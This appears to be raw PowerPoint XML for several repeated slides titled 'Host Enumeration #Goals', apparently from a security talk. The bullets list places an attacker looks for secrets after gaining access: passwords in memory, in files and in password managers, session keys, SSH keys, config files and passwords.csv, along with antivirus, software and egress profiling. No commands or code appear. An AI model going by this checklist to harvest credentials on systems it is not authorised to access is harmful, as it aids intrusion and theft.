      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28529633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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A639AD-F986-4E98-89C2-7B29EA4EDAA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8495DE3-8B46-4F25-ACE8-FEEB56287A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1593273"/>
            <a:ext cx="3193473" cy="2071254"/>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1708272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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7154004F-9441-4E66-94EF-82F9EFCAE452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD25936-C8FB-4488-9F0C-11EB72682299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536099" y="3715736"/>
            <a:ext cx="4091319" cy="2071254"/>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5955798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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
